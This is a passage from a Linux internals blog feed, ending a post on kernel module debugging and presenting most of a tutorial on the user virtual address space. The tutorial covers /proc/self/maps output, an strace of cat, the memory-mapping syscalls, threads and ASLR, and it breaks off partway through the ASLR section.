Just remember that even with KASLR disabled, this address can be different each time you load the module, but at least you only need to grab the <code>your_module.ko</code> once.</p><h4 id="misc-gdb-tips">Misc GDB Tips</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/whathaveidone.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="500" height="212"></figure><p>Oof, well this post is already careening towards 4000 words (and I did this voluntarily, for fun?!), so I think I&apos;ll just link to my repository where you can find some useful gdb/gef commands for debugging the Linux kernel!</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#useful-gdb-commands"><div class="kg-bookmark-content"><div class="kg-bookmark-title">linux-kernel-resources/debugging at main &#xB7; sam4k/linux-kernel-resources</div><div class="kg-bookmark-description">Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists. 
- linux-kernel-resources/debugging at main &#xB7; sam4k/linux-kernel-resources</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">sam4k</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/d0c9155bd817a370c31ae92cb655510b1e99c985f42cb4243223386cf352a05f/sam4k/linux-kernel-resources" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"></div></a></figure><h4 id="other-stuff">Other Stuff</h4><p>As we&apos;re transitioning into a speedrun (congratulations to anyone who read the whole thing!), I&apos;ll attempt to quickly touch on some other useful debugging resources:</p><ul><li><a href="https://github.com/osandov/drgn">drgn</a>: remember earlier, when I said debugging the kernel you&apos;re using can be tricky? Well drgn is an extremely programmable debugger, written in python (and not 36 years ago), that among other things allows you to do live introspection on your kernel. I still need to explore this more, but I wouldn&apos;t see it as a replacement for gdb for example, but a different tool for different goals.</li><li><strong>strace</strong>: ah yes, our old friend, strace(1). The system call tracing utility can be useful for complementing your kernel debugging by tracing the interactions between your poc/userland interface/program and the kernel. With minimal faff you can home in on what kernel functions you may want to focus your debugging endeavours on.</li><li><strong>procfs</strong>: another reminder about the various introspection available via <code>/proc/</code>; you saw earlier that we made use of <code>/proc/modules</code>. There&apos;s plenty to explore here.</li><li><strong>man pages</strong>: don&apos;t sleep on the man pages! 
Although there generally aren&apos;t pages on kernel internals, the syscall section <code>(2)</code> can help with understanding some of the interactions that go on</li><li><strong>source</strong>: due to word count concerns, oops, and the fact I never really use it, I haven&apos;t included adding source into gdb but that doesn&apos;t mean you can&apos;t have it up for reference! I always try to have a copy of source handy to explore, not to mention the documentation that&apos;s usually available somewhere in the kernel too</li></ul><hr><ol><li><a href="https://www.sourceware.org/gdb/">https://www.sourceware.org/gdb/</a></li><li><a href="https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html">https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html</a></li><li>Future post idea? Dive into some debugging internals</li><li><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm">https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm</a></li><li>If your guest is a different architecture to your host, gdb needs to know about it, so you&apos;ll need to install and use <code>gdb-multiarch</code> &#xA0;</li></ol><h2 id="faq">FAQ</h2><p>So this is a little bit of an experiment, and maybe more suited to the GitHub repo, but if anyone has any questions feel free to <a href="https://twitter.com/sam4k1">@ me on Twitter</a> and I&apos;ll try to keep this FAQ updated. Also, if anyone has any suggestions for FAQs, I&apos;m happy to add those too :)</p><h2 id="postamble">Postamble</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/didwemakeit.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="270"></figure><p>Talk about feature creep, eh? 
We certainly covered a lot of ground in this post: from building the kernel to patching modules to setting up our debugging environment.</p><p>Hopefully some of this (or all!) has been useful, and maybe helped demystify things. As I briefly mentioned in the intro, I&apos;ve included all the essentials in a <a href="https://github.com/sam4k/linux-kernel-resources">github repository</a>, which I&apos;ll continue to update with any useful Linux kernel resources/demos/shenanigans. </p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/sam4k/linux-kernel-resources"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - sam4k/linux-kernel-resources: Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists.</div><div class="kg-bookmark-description">Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists. - GitHub - sam4k/linux-kernel-resources: Curated collection of resources, examples and script...</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">sam4k</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/d0c9155bd817a370c31ae92cb655510b1e99c985f42cb4243223386cf352a05f/sam4k/linux-kernel-resources" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"></div></a></figure><p>I think by nature of the work we do, as programmers and &quot;hackers&quot;, a lot of times we find ourselves creating hacky solutions and shortcuts, then through some twisted process of natural selection some of these make their way into our workflow.</p><p>Though, perhaps because we consider them too niche or too messy, we often don&apos;t share these solutions or quick tricks and so 
the cycle continues. Is this necessarily a bad thing? Of course not! I love to tinker and believe me, I have many a bash script that should never see the light of day, but perhaps there are also a few that would help others if they did.</p><p>So really, this post is just a culmination of my own hacky, messy natural selection that has occurred during my time working on kernel stuff, so don&apos;t @ me if it&apos;s horribly wrong (DM me instead, pls help me), but hopefully there&apos;s some takeaways here that will inspire others to tinker and perhaps save some time in the process.</p><p><em><strong>Obligatory <a href="https://twitter.com/sam4k1">@ me</a> for any suggestions, corrections or questions!</strong></em></p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Linternals: The User Virtual Address Space]]></title><description><![CDATA[We continue our journey to understand virtual memory in Linux, as we take a closer look at the user virtual address space.]]></description><link>https://sam4k.com/linternals-virtual-memory-0x02/</link><guid isPermaLink="false">61e3402b7742d008b38dce20</guid><category><![CDATA[linternals]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Sun, 20 Mar 2022 19:00:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/02/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/02/linternals.gif" alt="Linternals: The User Virtual Address Space"><p>Ready to dive back into some Linternals? I hope so! 
So to recap, <a href="https://sam4k.com/linternals-virtual-memory-part-1/">last time</a>, we covered some virtual memory fundamentals including:</p><ul><li>Virtual vs physical memory</li><li>The virtual address space</li><li>The VM split (user and kernel virtual address spaces)</li></ul><p>This time we&apos;re going to zoom in and focus on the two parts of the virtual memory split, taking a look at the user and kernel virtual address spaces.</p><p>Hopefully, after that, we&apos;ll have a good idea of how - and why - our Linux system uses virtual memory. At which point we&apos;ll take a look at how this is all implemented behind the scenes, examining some kernel and hardware specifics!</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#0x04-user-virtual-address-space">0x04 User Virtual Address Space</a>
<ul>
<li><a href="#userspace-mappings">Userspace Mappings</a></li>
<li><a href="#the-setup">The Setup</a>
<ul>
<li>brk()</li>
<li>mmap()</li>
<li>mprotect()</li>
<li>execve()</li>
</ul>
</li>
<li><a href="#threads">Threads</a></li>
<li><a href="#aslr">ASLR</a></li>
<li><a href="#wrapping-up-in-uvas">Wrapping Up In UVAS</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="0x04-user-virtual-address-space">0x04 User Virtual Address Space</h2><p>Alrighty then, first things first, let&apos;s actually take a look at what a typical process uses the user virtual address space (UVAS) for. Luckily, I don&apos;t have to whip up a diagram for this, as we can use the <code>/proc</code> filesystem!</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text">procfs is a virtual filesystem that is created at boot. It acts as an interface to internal data structures in the kernel. It can be used to obtain information about the system and to change certain kernel parameters at runtime (sysctl). <sup>[1]</sup></div></div><p>Inside procfs, you can inspect running processes by PID. For example, the file <code>/proc/854/maps</code> will contain information about the mappings for the process with PID 854. </p><p>To make life easier, there&apos;s a handy link, <code>/proc/self/</code>, which will point to the process currently reading the file - pretty neat! Beyond <code>maps</code>, there&apos;s all sorts of information we can learn from procfs; check <code>man procfs</code> for more info. </p><hr><ol><li><a href="https://www.kernel.org/doc/html/latest/filesystems/proc.html">https://www.kernel.org/doc/html/latest/filesystems/proc.html</a></li></ol><h3 id="userspace-mappings">Userspace Mappings</h3><p>Back on topic! Let&apos;s use the procfs to take a closer look at what our UVAS is being used for. From the man page, we learn the <code>maps</code> procfs file contains &quot;the currently mapped memory regions and their access permissions&quot; for a process.</p><p>We&apos;ll touch more on the implementation later, but for now it&apos;s worth remembering that the virtual address space is <strong>vast</strong> and largely empty. 
If a process needs to use some memory, either to load the contents of a file or to store data, it will ask the kernel to map that memory appropriately. Now that virtual address is actually pointing to something.</p><p>Using the <code>self</code> link we talked about earlier, and the <code>maps</code> file, we can use <code>cat</code> to output the details of its own memory mappings:</p><!--kg-card-begin: markdown--><pre><code class="language-console">$ cat /proc/self/maps 
5577277d1000-5577277d3000 r--p 00000000 00:19 868257                     /usr/bin/cat
5577277d3000-5577277d8000 r-xp 00002000 00:19 868257                     /usr/bin/cat
5577277d8000-5577277db000 r--p 00007000 00:19 868257                     /usr/bin/cat
5577277db000-5577277dc000 r--p 00009000 00:19 868257                     /usr/bin/cat
5577277dc000-5577277dd000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
557728bca000-557728beb000 rw-p 00000000 00:00 0                          [heap]
7fc863779000-7fc863a63000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
7fc863a63000-7fc863a66000 rw-p 00000000 00:00 0 
7fc863a66000-7fc863a92000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
7fc863a92000-7fc863c08000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c08000-7fc863c5c000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c5c000-7fc863c5d000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c5d000-7fc863c60000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c60000-7fc863c63000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c63000-7fc863c72000 rw-p 00000000 00:00 0 
7fc863c7e000-7fc863ca0000 rw-p 00000000 00:00 0 
7fc863ca0000-7fc863ca2000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863ca2000-7fc863cc9000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cc9000-7fc863cd4000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cd5000-7fc863cd7000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cd7000-7fc863cd9000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7ffddc9a0000-7ffddc9c1000 rw-p 00000000 00:00 0                          [stack]
7ffddc9f4000-7ffddc9f8000 r--p 00000000 00:00 0                          [vvar]
7ffddc9f8000-7ffddc9fa000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</code></pre>
<!--kg-card-end: markdown--><p>Sweet! Well, there&apos;s a lot to unpack here, though some of it should look familiar. Consulting <code>man procfs</code> we can see the columns are as follows:</p><p><code>(virtual) address, &#xA0; perms, &#xA0; offset, &#xA0; dev, &#xA0; inode, &#xA0; pathname</code><br></p><p>If we recall from last time, on a typical x86_64 setup like mine, the most significant 16 bits (MSB 16) of userspace virtual addresses are all 0, while for kernel virtual addresses they&apos;re all 1. </p><p>This means we can normally spot kernel addresses at a glance as they begin <code>0xffff...</code> while userspace addresses begin with <code>0x0000...</code> and are as a result typically shorter.</p><p>Anyway, before we scroll too far away from the code block (oops), let&apos;s unpack some of these lines of output, shall we?</p><ul><li><strong>Lines 2-6</strong>: here we can see the mappings for the binary being run, found at <code>/usr/bin/cat</code>. Why are there multiple mappings for one binary file? Typically programs are made up of multiple sections, with differing perms. The .text section where the code is? We&apos;ll want that readable &amp; executable. Some portions of data, like our static consts, want to be read-only (.rodata), while mutable data wants to be readable and writable (.data) <sup>[1]</sup></li><li><strong>Line 7:</strong> procfs uses the pseudo-path <code>[heap]</code> to describe the mapping for the heap (no surprise there); a dynamic memory pool</li><li><strong>Lines 8,10-15:</strong> next up we can see several shared libraries being mapped into memory, for the program to use. We can see locale information and libc; again these may be split up into multiple mappings as touched on a moment ago <sup>[2]</sup></li><li><strong>Lines 9,16,17:</strong> these weird mappings with no pathname are called <strong>anonymous mappings </strong>and are not backed by any file. 
This is essentially a blank memory region that a userspace process can use at its discretion. Examples of anonymous mappings include both the stack and the heap <sup>[3]</sup></li><li><strong>Lines 18-22:</strong> <code>ld.so</code> is the dynamic linker that is invoked anytime we run a dynamically linked program (a quick check of <code>file /usr/bin/cat</code> will confirm this is indeed a dynamically linked program!)</li><li><strong>Line 23:</strong> another pseudo-path, <code>[stack]</code> is the mapping for our process&apos;s stack space</li><li><strong>Line 25:</strong> The &quot;virtual dynamic shared object&quot; (or vDSO) is a small shared library exported by the kernel to accelerate the execution of certain system calls that do not necessarily have to run in kernel space <sup>[5]</sup> </li><li><strong>Line 24:</strong> The <code>vvar</code> is a special page mapped into memory in order to store a &quot;mirror&quot; of kernel variables required by the virtual syscalls exported by the kernel</li><li><strong>Line 26:</strong> The <code>vsyscall</code> mapping is a legacy mechanism: it provided an executable mapping of kernel code for specific syscalls that didn&apos;t require elevated privileges, and hence avoided the whole user &#xA0;-&gt; kernel mode context switch. Suffice to say it&apos;s defunct now, and calls to the vsyscall table still work for compatibility, but now actually trap and act as a normal syscall <sup>[6]</sup></li></ul><p>And just like that we&apos;ve pieced together the various userspace (and some kernel stuff) mappings for an everyday program like <code>cat</code>! Pretty neat. 
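You can poke around like this for any live process too; a quick sketch, grepping for a few of the pseudo-paths we just covered:</p><pre><code class="language-console"># start a throwaway background process and inspect its mappings by PID ($!)
$ sleep 60 &amp;
$ grep -e '\[stack\]' -e '\[vdso\]' /proc/$!/maps</code></pre><p>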
In addition we&apos;ve dived into some of the tools the kernel provides us to examine this information.</p><hr><ol><li>For more information on the different sections of our binary, we can cross-reference the <code>offset</code> information we get from <code>/proc/self/maps</code> with the ELF section headers using <code>objdump -h /usr/bin/cat</code></li><li><code>ldd</code> lets us print the shared libraries required by a program; we can explore this more by checking out <code>ldd /usr/bin/cat</code>, though for reasons out of scope for this post, it won&apos;t look identical to our <code>maps</code> output</li><li>If we want to get ahead of ourselves, <code>man 2 mmap</code> <sup>[4]</sup> describes the system call userspace programs use to ask the kernel to map regions of memory</li><li>The <code>2</code> in <code>man 2 mmap</code> says we want to look at man section 2, for syscalls, and not section 3 for lib functions. <code>man -k mmap</code> lets us search all the sections for references to <code>mmap</code></li><li><a href="https://lwn.net/Articles/615809/">Implementing virtual system calls @ LWN</a> </li><li>As expected, we can see the vsyscall address is located within the kernel half of the virtual address space, by the leading <code>0xffff...</code></li></ol><h3 id="the-setup">The Setup</h3><p>I&apos;m going to cover the kernel and hardware side of things in coming sections, but I think it&apos;s worth touching on how we go from running <code>cat /proc/self/maps</code> to the memory mapping we saw above.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/how_that_happeen.gif" class="kg-image" alt="Linternals: The User Virtual Address Space" loading="lazy" width="476" height="254"></figure><p>In the last part we mentioned that system calls act as the fundamental interface between userspace applications and the kernel. If an unprivileged userspace process needs to do a privileged action (e.g. 
map some memory), it can use the syscall interface to ask the kernel to carry out this action on its behalf <sup>[1]</sup>.</p><p>Now that we know what&apos;s being mapped, let&apos;s have a closer look at how, by revisiting <code>strace</code>. <code>strace</code> simply traces the system calls and signals made by a program. As we know memory mapping is handled by the kernel and system calls are how programs get the kernel to do this, <code>strace</code> seems like a good bet!</p><pre><code class="language-console">$ strace cat /proc/self/maps
execve(&quot;/usr/bin/cat&quot;, [&quot;cat&quot;, &quot;/proc/self/maps&quot;], 0x7fff3a014fd8 /* 61 vars */) = 0
brk(NULL)                               = 0x5622ee613000
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffe5d536650) = -1 EINVAL (Invalid argument)
access(&quot;/etc/ld.so.preload&quot;, R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, &quot;/etc/ld.so.cache&quot;, O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, &quot;&quot;, {st_mode=S_IFREG|0644, st_size=185283, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 185283, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa129bcd000
close(3)                                = 0
openat(AT_FDCWD, &quot;/usr/lib/libc.so.6&quot;, O_RDONLY|O_CLOEXEC) = 3
read(3, &quot;\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0&gt;\0\1\0\0\0\320\324\2\0\0\0\0\0&quot;..., 832) = 832
pread64(3, &quot;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&quot;..., 784, 64) = 784
pread64(3, &quot;\4\0\0\0@\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0&quot;..., 80, 848) = 80
pread64(3, &quot;\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\205vn\235\204X\261n\234|\346\340|q,\2&quot;..., 68, 928) = 68
newfstatat(3, &quot;&quot;, {st_mode=S_IFREG|0755, st_size=2463384, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bcb000
pread64(3, &quot;\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0&quot;..., 784, 64) = 784
mmap(NULL, 2136752, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fa1299c1000
mprotect(0x7fa1299ed000, 1880064, PROT_NONE) = 0
mmap(0x7fa1299ed000, 1531904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2c000) = 0x7fa1299ed000
mmap(0x7fa129b63000, 344064, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a2000) = 0x7fa129b63000
mmap(0x7fa129bb8000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1f6000) = 0x7fa129bb8000
mmap(0x7fa129bbe000, 51888, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fa129bbe000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa1299be000
arch_prctl(ARCH_SET_FS, 0x7fa1299be740) = 0
set_tid_address(0x7fa1299bea10)         = 28003
set_robust_list(0x7fa1299bea20, 24)     = 0
rseq(0x7fa1299bf0e0, 0x20, 0, 0x53053053) = 0
mprotect(0x7fa129bb8000, 12288, PROT_READ) = 0
mprotect(0x5622ec6d3000, 4096, PROT_READ) = 0
mprotect(0x7fa129c30000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7fa129bcd000, 185283)          = 0
getrandom(&quot;\x62\xf6\x2b\x64\xd3\x81\xee\x98&quot;, 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x5622ee613000
brk(0x5622ee634000)                     = 0x5622ee634000
openat(AT_FDCWD, &quot;/usr/lib/locale/locale-archive&quot;, O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, &quot;&quot;, {st_mode=S_IFREG|0644, st_size=3053472, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 3053472, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa1296d4000
close(3)                                = 0
newfstatat(1, &quot;&quot;, {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x1), ...}, AT_EMPTY_PATH) = 0
openat(AT_FDCWD, &quot;/proc/self/maps&quot;, O_RDONLY) = 3
newfstatat(3, &quot;&quot;, {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bd9000
read(3, &quot;5622ec6c9000-5622ec6cb000 r--p 0&quot;..., 131072) = 2153
write(1, &quot;5622ec6c9000-5622ec6cb000 r--p 0&quot;..., 21535622ec6c9000-5622ec6cb000 r--p 00000000 00:19 868257                     /usr/bin/cat
5622ec6cb000-5622ec6d0000 r-xp 00002000 00:19 868257                     /usr/bin/cat
5622ec6d0000-5622ec6d3000 r--p 00007000 00:19 868257                     /usr/bin/cat
5622ec6d3000-5622ec6d4000 r--p 00009000 00:19 868257                     /usr/bin/cat
5622ec6d4000-5622ec6d5000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
5622ee613000-5622ee634000 rw-p 00000000 00:00 0                          [heap]
7fa1296d4000-7fa1299be000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
7fa1299be000-7fa1299c1000 rw-p 00000000 00:00 0 
7fa1299c1000-7fa1299ed000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
7fa1299ed000-7fa129b63000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
7fa129b63000-7fa129bb7000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bb7000-7fa129bb8000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bb8000-7fa129bbb000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bbb000-7fa129bbe000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bbe000-7fa129bcd000 rw-p 00000000 00:00 0 
7fa129bd9000-7fa129bfb000 rw-p 00000000 00:00 0 
7fa129bfb000-7fa129bfd000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129bfd000-7fa129c24000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c24000-7fa129c2f000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c30000-7fa129c32000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c32000-7fa129c34000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7ffe5d517000-7ffe5d538000 rw-p 00000000 00:00 0                          [stack]
7ffe5d5c7000-7ffe5d5cb000 r--p 00000000 00:00 0                          [vvar]
7ffe5d5cb000-7ffe5d5cd000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
) = 2153
read(3, &quot;&quot;, 131072)                     = 0
munmap(0x7fa129bd9000, 139264)          = 0
close(3)                                = 0
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++</code></pre><p>As we mentioned last time, there&apos;s <strong>a lot going on here</strong> for a program we expect to just be doing the equivalent of <code>read(/proc/self/maps)</code> and <code>write(stdout)</code>. In fact, on <strong>line 47</strong> &amp; <strong>48</strong> we can see just that happening. So what&apos;s up with the rest?</p><p>I&apos;m thinking it might be out-of-scope for this post to do a line-by-line breakdown (maybe a more specific post about ELFs and processes and stuff?), but let&apos;s highlight some of the main syscalls used for setting up our memory mapping:</p><h4 id="brk">brk()</h4><p>The <code>brk()</code> syscall is used to adjust the location of the &quot;program break&quot;, which defines the end of the process&apos;s data segment (aka the end of the heap). </p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text"><code>void *brk(void *addr);</code></div></div><p><code>brk(NULL)</code> makes no adjustment, so returns the current program break. We can see this on <strong>line 3</strong>, likely called during initialisation to figure out where the current heap ends, for memory allocators like <code>malloc()</code>.</p><p>Later on <strong>line 37</strong> we can see another call to <code>brk()</code>, asking to extend the program break to <code>0x5622ee634000</code>. If we take a look at the <code>maps</code> output on <strong>line 53</strong>, we can in fact see the heap does end at <code>0x5622ee634000</code> now! Sweet :)</p><h4 id="mmap">mmap()</h4><p>This is the big gun, responsible for the fabled &quot;mappings&quot; we&apos;ve been yapping on about. The <code>mmap()</code> syscall is used to create memory mappings (and <code>munmap()</code> for unmapping them). 
For more info on the args and more, don&apos;t forget to consult <code>man 2 mmap</code>.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text"><code>void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);</code></div></div><p>Remember, we can use <code>mmap()</code> to either map a file or device into virtual memory or simply to allocate a blank region of memory at a virtual address:</p><ul><li>On <strong>line 10</strong> we <code>openat()</code> our libc, identified by file descriptor 3. Then in <strong>lines 18-22</strong> we can see we make a series of <code>mmap()</code> calls with the fd arg set to 3; we can then cross-reference the permissions (e.g. <code>PROT_READ|PROT_WRITE</code>) and return addresses with the libc mappings we can see in our <code>maps</code> output on <strong>lines 56-61</strong></li><li>Conversely we can see some anonymous mappings, where the fd is set to <code>-1</code> and <code>mmap()</code> is passed the flag <code>MAP_ANONYMOUS</code>, like <strong>line 46</strong> <sup>[2]</sup></li></ul><h4 id="mprotect">mprotect()</h4><p>If <code>mmap()</code> is the big gun, then <code>mprotect()</code> is the syscall used to set the protections for a mapped region of memory (yeah, I couldn&apos;t think of an analogy okay). Typically these protections may be any combination of read, write and execute access flags. 
</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text"><code>int mprotect(void *addr, size_t len, int prot);</code></div></div><p>While we can include protection flags via the <code>prot</code> arg for <code>mmap()</code>, <code>mprotect()</code> allows us to set page-granular access flags, which we can update with each call, without having to map new regions of memory each time.</p><h4 id="execve">execve()</h4><p>Some of you might have noticed that while we can see regions being mapped for locale-archive and libc, what happened to <code>/usr/bin/cat</code> itself? Again, trying to keep within the scope of virtual memory, this setup is handled by the initial <code>execve()</code> system call on <strong>line 2</strong>.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text"><code>int execve(const char *pathname, char *const argv[], char *const envp[]);</code></div></div><p>When a new process is forked (created), <code>execve()</code> then &quot;executes the program referred to by <code>pathname</code>&quot; <sup>[3]</sup>. This initial call to <code>execve()</code> parses our ELF file <code>/usr/bin/cat</code> and initialises the necessary segments (e.g. text, stack, heap and data). </p><p>It&apos;s worth noting that when a process is created, it is done via <code>fork()</code>, which creates a new process by duplicating the calling process. However, <code>execve()</code> will create a new and empty virtual address space for the application at <code>pathname</code>. </p><hr><ol><li>A deep dive on syscalls is out of scope for this talk, but I might touch on it down the line. 
In the meantime, <code>man</code> pages are your friend, try <code>man syscalls</code> :)</li><li>Honestly, without digging some more I&apos;m not 100% sure what these are being used for, though likely for something by the shared libs - exercise for the reader? :P</li><li>Surprise, surprise, this is from <code>man 2 execve</code>!</li></ol><h3 id="threads">Threads</h3><p>So, we&apos;ve talked a lot about how our usermode processes live in happy isolation within their sandboxed virtual address spaces. Is this <strong><em>always </em></strong>the case? Nope, and one reason is threads.</p><p>Threads are essentially light-weight processes and represent a flow of execution within an application. The reason they&apos;re &quot;light-weight processes&quot; is that when threads are created, instead of using <code>fork()</code> they use a similar system call, <code>clone()</code>. </p><p><code>clone()</code> is also used to create a process, but allows more control over what resources are shared between the parent and the new process. As a result, in Linux, threads <strong><em>share</em></strong> the same virtual address space and mappings (heap included), though each thread gets its own stack mapping.</p><h3 id="aslr">ASLR</h3><p>Some of you eager enough to run these commands multiple times may have noticed that the addresses for your mappings change each time you run <code>cat</code>. What gives?</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/confused_girl.gif" class="kg-image" alt="Linternals: The User Virtual Address Space" loading="lazy" width="400" height="182"></figure><p>Without deviating too far off-topic, this is actually normal! It&apos;d be more concerning if nothing changed, as this is the result of a mitigation called ASLR: Address Space Layout Randomisation <sup>[1]</sup>.</p><p>ASLR does exactly what it says on the tin, randomising by default the virtual addresses that the stack, heap and shared libraries are mapped to each time the program is run. 
